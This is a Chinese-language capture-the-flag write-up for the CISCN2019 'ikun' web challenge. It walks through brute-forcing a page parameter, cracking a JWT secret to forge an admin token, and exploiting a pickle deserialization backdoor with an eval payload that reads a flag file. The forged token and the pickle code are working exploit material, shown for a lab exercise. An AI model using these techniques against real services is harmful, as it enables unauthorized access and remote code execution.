[CISCN2019 华北赛区 Day1 Web2]ikun

知识点：pickle ，jwt 伪造，爆破密钥

分析

有 page 参数爆破一下，在 181 页有 lv6。

import requests
url = 'http://35a050dd-3910-4ff7-a152-cfd976289c2b.node4.buuoj.cn:81/shop?page='

for i in range(1000):
    req = requests.get(url=url+str(i))
    if 'lv6.png' in req.text:
        print(i)
        break

在结算处可以改折扣数，但不知道为什么不能白嫖

访问 /b1g_m4mber 熟悉的页面，直接看 cookie

嗯，考点很显眼

这边无签名攻击行不通了，看了 wp 才知道可以爆破密钥

jwt爆破密钥

使用 c-jwt-cracker 爆破

c-jwt-cracker 安装坑

到 c-jwt-cracker 目录下直接 make，如果显示如下报错。

运行如下命令

sudo apt-get update
sudo apt-get install libssl-dev

最后 make

爆破密钥

使用 密钥 1Kun 加密 ，修改 username 为 admin

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.40on__HQ8B2-wM1ZSwax3ivRK4j54jlaXv-1JjQynjo

以 admin 访问后，在网页源码处有提示，有个源码压缩包

getflag

在 setting.py 处有提示，告诉我们有后门

最后在 Admin.py 里看到一个 pickle 反序列化漏洞

os.system和os.popen 都用不了，最后看来大佬们的使用 eval

import pickle
import urllib.parse

class exp(object):
    def __reduce__(self):
        return (eval,("open('/flag.txt').read()",))

a=exp()
s=pickle.dumps(a,protocol=0)
print(urllib.parse.quote(s))